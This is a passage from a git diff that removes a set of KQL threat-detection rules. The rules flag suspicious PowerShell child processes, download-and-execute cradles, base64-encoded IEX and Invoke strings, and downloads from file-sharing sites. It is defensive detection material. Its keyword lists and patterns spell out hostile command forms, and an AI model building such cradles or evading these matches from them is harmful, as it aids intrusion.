endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\WinRAR.exe" \ No newline at end of file diff --git a/Execution/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql b/Execution/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql deleted file mode 100644 index a30d1353..00000000 --- a/Execution/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2024/05/13 -// Level: medium -// Description: Detects potentially suspicious child processes of KeyScrambler.exe -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1203, attack.t1574.002 -DeviceProcessEvents -| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe" \ No newline at end of file diff --git a/Execution/Potentially_Suspicious_Electron_Application_CommandLine.kql b/Execution/Potentially_Suspicious_Electron_Application_CommandLine.kql deleted file mode 100644 index 9450e461..00000000 --- a/Execution/Potentially_Suspicious_Electron_Application_CommandLine.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/09/05 -// Level: medium -// Description: Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary. -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains "--browser-subprocess-path" or ProcessCommandLine contains "--gpu-launcher" or ProcessCommandLine contains "--renderer-cmd-prefix" or ProcessCommandLine contains "--utility-cmd-prefix") and ((FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\code.exe" or FolderPath endswith "\\discord.exe" or FolderPath endswith "\\GitHubDesktop.exe" or FolderPath endswith "\\keybase.exe" or FolderPath endswith "\\msedge_proxy.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\msedgewebview2.exe" or FolderPath endswith "\\msteams.exe" or FolderPath endswith "\\slack.exe" or FolderPath endswith "\\Teams.exe") or (ProcessVersionInfoOriginalFileName in~ ("chrome.exe", "code.exe", "discord.exe", "GitHubDesktop.exe", "keybase.exe", "msedge_proxy.exe", "msedge.exe", "msedgewebview2.exe", "msteams.exe", "slack.exe", "Teams.exe"))) \ No newline at end of file diff --git a/Execution/Potentially_Suspicious_Execution_Of_PDQDeployRunner.kql b/Execution/Potentially_Suspicious_Execution_Of_PDQDeployRunner.kql deleted file mode 100644 index b775a211..00000000 --- a/Execution/Potentially_Suspicious_Execution_Of_PDQDeployRunner.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/22 -// Level: medium -// Description: Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines -// Tags: attack.execution -DeviceProcessEvents -| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\csc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe") or (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\TEMP\\" or FolderPath contains "\\AppData\\Local\\Temp") or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -encodedcommand " or ProcessCommandLine contains " -w hidden" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "http" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-")) and InitiatingProcessFolderPath contains "\\PDQDeployRunner-" \ No newline at end of file diff --git a/Execution/Potentially_Suspicious_File_Download_From_File_Sharing_Domain_Via_PowerShell.EXE.kql b/Execution/Potentially_Suspicious_File_Download_From_File_Sharing_Domain_Via_PowerShell.EXE.kql deleted file mode 100644 index d5ba34b0..00000000 --- a/Execution/Potentially_Suspicious_File_Download_From_File_Sharing_Domain_Via_PowerShell.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024/02/23 -// Level: high -// Description: Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") \ No newline at end of file diff --git a/Execution/Potentially_Suspicious_PowerShell_Child_Processes.kql b/Execution/Potentially_Suspicious_PowerShell_Child_Processes.kql deleted file mode 100644 index 9a025e0f..00000000 --- a/Execution/Potentially_Suspicious_PowerShell_Child_Processes.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Tim Shelton -// Date: 2022/04/26 -// Level: high -// Description: Detects potentially suspicious child processes spawned by PowerShell -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (not((ProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\" and InitiatingProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\"))) \ No newline at end of file diff --git a/Execution/Potentially_Suspicious_WebDAV_LNK_Execution.kql b/Execution/Potentially_Suspicious_WebDAV_LNK_Execution.kql deleted file mode 100644 index f6568258..00000000 --- a/Execution/Potentially_Suspicious_WebDAV_LNK_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Micah Babinski -// Date: 2023/08/21 -// Level: medium -// Description: Detects possible execution via LNK file accessed on a WebDAV server. -// Tags: attack.execution, attack.t1059.001, attack.t1204 -DeviceProcessEvents -| where ProcessCommandLine contains "\\DavWWWRoot\\" and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\explorer.exe" \ No newline at end of file diff --git a/Execution/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql b/Execution/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql deleted file mode 100644 index e2931fc4..00000000 --- a/Execution/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/08/24 -// Level: high -// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line -// Tags: attack.defense_evasion, attack.t1140, attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "OjpGcm9tQmFzZTY0U3RyaW5n" or ProcessCommandLine contains "o6RnJvbUJhc2U2NFN0cmluZ" or ProcessCommandLine contains "6OkZyb21CYXNlNjRTdHJpbm" or (ProcessCommandLine contains "OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA" or ProcessCommandLine contains "oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA" or ProcessCommandLine contains "6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw") \ No newline at end of file diff --git a/Execution/PowerShell_Base64_Encoded_IEX_Cmdlet.kql b/Execution/PowerShell_Base64_Encoded_IEX_Cmdlet.kql deleted file mode 100644 index 3f4eb318..00000000 --- a/Execution/PowerShell_Base64_Encoded_IEX_Cmdlet.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/08/23 -// Level: high -// Description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "SUVYIChb" or ProcessCommandLine contains "lFWCAoW" or ProcessCommandLine contains "JRVggKF" or ProcessCommandLine contains "aWV4IChb" or ProcessCommandLine contains "lleCAoW" or ProcessCommandLine contains "pZXggKF" or ProcessCommandLine contains "aWV4IChOZX" or ProcessCommandLine contains "lleCAoTmV3" or ProcessCommandLine contains "pZXggKE5ld" or ProcessCommandLine contains "SUVYIChOZX" or ProcessCommandLine contains "lFWCAoTmV3" or ProcessCommandLine contains "JRVggKE5ld" or ProcessCommandLine contains "SUVYKF" or ProcessCommandLine contains "lFWChb" or ProcessCommandLine contains "JRVgoW" or ProcessCommandLine contains "aWV4KF" or ProcessCommandLine contains "lleChb" or ProcessCommandLine contains "pZXgoW" or ProcessCommandLine contains "aWV4KE5ld" or ProcessCommandLine contains "lleChOZX" or ProcessCommandLine contains "pZXgoTmV3" or ProcessCommandLine contains "SUVYKE5ld" or ProcessCommandLine contains "lFWChOZX" or ProcessCommandLine contains "JRVgoTmV3" or ProcessCommandLine contains "SUVYKCgn" or ProcessCommandLine contains "lFWCgoJ" or ProcessCommandLine contains "JRVgoKC" or ProcessCommandLine contains "aWV4KCgn" or ProcessCommandLine contains "lleCgoJ" or ProcessCommandLine contains "pZXgoKC") or (ProcessCommandLine contains "SQBFAFgAIAAoAFsA" or ProcessCommandLine contains "kARQBYACAAKABbA" or ProcessCommandLine contains "JAEUAWAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAFsA" or ProcessCommandLine contains "kAZQB4ACAAKABbA" or ProcessCommandLine contains "pAGUAeAAgACgAWw" or ProcessCommandLine contains "aQBlAHgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kAZQB4ACAAKABOAGUAdw" or ProcessCommandLine contains "pAGUAeAAgACgATgBlAHcA" or ProcessCommandLine contains "SQBFAFgAIAAoAE4AZQB3A" or ProcessCommandLine contains "kARQBYACAAKABOAGUAdw" or ProcessCommandLine contains "JAEUAWAAgACgATgBlAHcA") \ No newline at end of file diff --git a/Execution/PowerShell_Base64_Encoded_Invoke_Keyword.kql b/Execution/PowerShell_Base64_Encoded_Invoke_Keyword.kql deleted file mode 100644 index be3160c2..00000000 --- a/Execution/PowerShell_Base64_Encoded_Invoke_Keyword.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t -// Date: 2022/05/20 -// Level: high -// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where ProcessCommandLine contains " -e" and (ProcessCommandLine contains "SQBuAHYAbwBrAGUALQ" or ProcessCommandLine contains "kAbgB2AG8AawBlAC0A" or ProcessCommandLine contains "JAG4AdgBvAGsAZQAtA" or ProcessCommandLine contains "SW52b2tlL" or ProcessCommandLine contains "ludm9rZS" or ProcessCommandLine contains "JbnZva2Ut") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Execution/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql b/Execution/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql deleted file mode 100644 index 7b67f975..00000000 --- a/Execution/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems), pH-T (Nextron Systems) -// Date: 2022/03/01 -// Level: high -// Description: Detects base64 encoded .NET reflective loading of Assembly -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027, attack.t1620 -DeviceProcessEvents -| where ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" or ProcessCommandLine contains "AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC" or ProcessCommandLine contains "BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp" or ProcessCommandLine contains "AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK" or ProcessCommandLine contains "WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ" or ProcessCommandLine contains "sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA" or ProcessCommandLine contains "bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA" or ProcessCommandLine contains "WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA" or ProcessCommandLine contains "sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA" or ProcessCommandLine contains "bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA" \ No newline at end of file diff --git a/Execution/PowerShell_Base64_Encoded_WMI_Classes.kql b/Execution/PowerShell_Base64_Encoded_WMI_Classes.kql deleted file mode 100644 index 78c3b4de..00000000 --- a/Execution/PowerShell_Base64_Encoded_WMI_Classes.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/30 -// Level: high -// Description: Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc. -// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027 -DeviceProcessEvents -| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and ((ProcessCommandLine contains "VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg" or ProcessCommandLine contains "V2luMzJfTG9nZ2VkT25Vc2Vy" or ProcessCommandLine contains "dpbjMyX0xvZ2dlZE9uVXNlc" or ProcessCommandLine contains "XaW4zMl9Mb2dnZWRPblVzZX") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw" or ProcessCommandLine contains "cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA" or ProcessCommandLine contains "V2luMzJfUHJvY2Vzc" or ProcessCommandLine contains "dpbjMyX1Byb2Nlc3" or ProcessCommandLine contains "XaW4zMl9Qcm9jZXNz") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg" or ProcessCommandLine contains "V2luMzJfU2NoZWR1bGVkSm9i" or ProcessCommandLine contains "dpbjMyX1NjaGVkdWxlZEpvY" or ProcessCommandLine contains "XaW4zMl9TY2hlZHVsZWRKb2") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ" or ProcessCommandLine contains "cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A" or ProcessCommandLine contains "V2luMzJfU2hhZG93Y29we" or ProcessCommandLine contains "dpbjMyX1NoYWRvd2NvcH" or ProcessCommandLine contains "XaW4zMl9TaGFkb3djb3B5") or (ProcessCommandLine contains "VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A" or ProcessCommandLine contains "cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA" or ProcessCommandLine contains "XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA" or ProcessCommandLine contains "V2luMzJfVXNlckFjY291bn" or ProcessCommandLine contains "dpbjMyX1VzZXJBY2NvdW50" or ProcessCommandLine contains "XaW4zMl9Vc2VyQWNjb3Vud")) \ No newline at end of file diff --git a/Execution/PowerShell_Core_DLL_Loaded_By_Non_PowerShell_Process.kql b/Execution/PowerShell_Core_DLL_Loaded_By_Non_PowerShell_Process.kql deleted file mode 100644 index 1036a4ff..00000000 --- a/Execution/PowerShell_Core_DLL_Loaded_By_Non_PowerShell_Process.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2019/11/14 -// Level: medium -// Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process. -Detects behavior similar to meterpreter's "load powershell" extension. - -// Tags: attack.t1059.001, attack.execution -DeviceImageLoadEvents -| where (InitiatingProcessVersionInfoFileDescription =~ "System.Management.Automation" or InitiatingProcessVersionInfoOriginalFileName =~ "System.Management.Automation.dll" or (FolderPath endswith "\\System.Management.Automation.dll" or FolderPath endswith "\\System.Management.Automation.ni.dll")) and (not((((InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\") and InitiatingProcessFolderPath endswith "\\mscorsvw.exe") or (InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dsac.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\System32\\RemoteFXvGPUDisablement.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\runscripthelper.exe" or InitiatingProcessFolderPath endswith ":\\WINDOWS\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\ServerManager.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\SyncAppvPublishingServer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\winrshost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\winrshost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\wsmprovhost.exe")))) and (not((isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath contains ":\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessFolderPath endswith "\\Citrix\\ConfigSync\\ConfigSyncRun.exe" or (InitiatingProcessFolderPath contains ":\\Windows\\Temp\\asgard2-agent\\" and (InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe")) or ((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft SQL Server Management Studio" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft SQL Server Management Studio") and InitiatingProcessFolderPath endswith "\\IDE\\Ssms.exe") or ((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft SQL Server\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft SQL Server\\") and InitiatingProcessFolderPath endswith "\\Tools\\Binn\\SQLPS.exe") or (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Visual Studio\\")))) \ No newline at end of file diff --git a/Execution/PowerShell_DownloadFile.kql b/Execution/PowerShell_DownloadFile.kql deleted file mode 100644 index da7ff4be..00000000 --- a/Execution/PowerShell_DownloadFile.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2020/08/28 -// Level: high -// Description: Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line -// Tags: attack.execution, attack.t1059.001, attack.command_and_control, attack.t1104, attack.t1105 -DeviceProcessEvents -| where ProcessCommandLine contains "powershell" and ProcessCommandLine contains ".DownloadFile" and ProcessCommandLine contains "System.Net.WebClient" \ No newline at end of file diff --git a/Execution/PowerShell_Download_Pattern.kql b/Execution/PowerShell_Download_Pattern.kql deleted file mode 100644 index cdfb87e6..00000000 --- a/Execution/PowerShell_Download_Pattern.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro -// Date: 2019/01/16 -// Level: medium -// Description: Detects a Powershell process that contains download commands in its command line string -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "string(" or ProcessCommandLine contains "file(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "net.webclient)." and ProcessCommandLine contains "download")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Execution/PowerShell_Download_and_Execution_Cradles.kql b/Execution/PowerShell_Download_and_Execution_Cradles.kql deleted file mode 100644 index 9e3c6d09..00000000 --- a/Execution/PowerShell_Download_and_Execution_Cradles.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/24 -// Level: high -// Description: Detects PowerShell download and execution cradles. -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr ") and (ProcessCommandLine contains ";iex $" or ProcessCommandLine contains "| IEX" or ProcessCommandLine contains "|IEX " or ProcessCommandLine contains "I`E`X" or ProcessCommandLine contains "I`EX" or ProcessCommandLine contains "IE`X" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "IEX (" or ProcessCommandLine contains "IEX(" or ProcessCommandLine contains "Invoke-Expression") \ No newline at end of file diff --git a/Execution/PowerShell_Execution_With_Potential_Decryption_Capabilities.kql b/Execution/PowerShell_Execution_With_Potential_Decryption_Capabilities.kql deleted file mode 100644 index 5a6718b4..00000000 --- a/Execution/PowerShell_Execution_With_Potential_Decryption_Capabilities.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/30 -// Level: high -// Description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware. -// Tags: attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains "Get-ChildItem " or ProcessCommandLine contains "dir " or ProcessCommandLine contains "gci " or ProcessCommandLine contains "ls ") and (ProcessCommandLine contains "Get-Content " or ProcessCommandLine contains "gc " or ProcessCommandLine contains "cat " or ProcessCommandLine contains "type " or ProcessCommandLine contains "ReadAllBytes") and ((ProcessCommandLine contains " ^| " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "-Recurse" and ProcessCommandLine contains "-Skip ") or (ProcessCommandLine contains " -ExpandProperty " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "WriteAllBytes" and ProcessCommandLine contains " .length ")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Execution/PowerShell_Script_Execution_Policy_Enabled.kql b/Execution/PowerShell_Script_Execution_Policy_Enabled.kql deleted file mode 100644 index 003aa763..00000000 --- a/Execution/PowerShell_Script_Execution_Policy_Enabled.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo -// Date: 2023/10/18 -// Level: low -// Description: Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed. -// Tags: attack.execution -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\EnableScripts" \ No newline at end of file diff --git a/Execution/PowerShell_Script_Run_in_AppData.kql b/Execution/PowerShell_Script_Run_in_AppData.kql deleted file mode 100644 index afece119..00000000 --- a/Execution/PowerShell_Script_Run_in_AppData.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community -// Date: 2019/01/09 -// Level: medium -// Description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "powershell.exe" or ProcessCommandLine contains "\\powershell" or ProcessCommandLine contains "\\pwsh" or ProcessCommandLine contains "pwsh.exe") and ((ProcessCommandLine contains "Local\\" or ProcessCommandLine contains "Roaming\\") and (ProcessCommandLine contains "/c " and ProcessCommandLine contains "\\AppData\\")) \ No newline at end of file diff --git a/Execution/PowerShell_Web_Download.kql b/Execution/PowerShell_Web_Download.kql deleted file mode 100644 index b25ef740..00000000 --- a/Execution/PowerShell_Web_Download.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/24 -// Level: medium -// Description: Detects suspicious ways to download files or content using PowerShell -// Tags: attack.command_and_control, attack.execution, attack.t1059.001, attack.t1105 -DeviceProcessEvents -| where 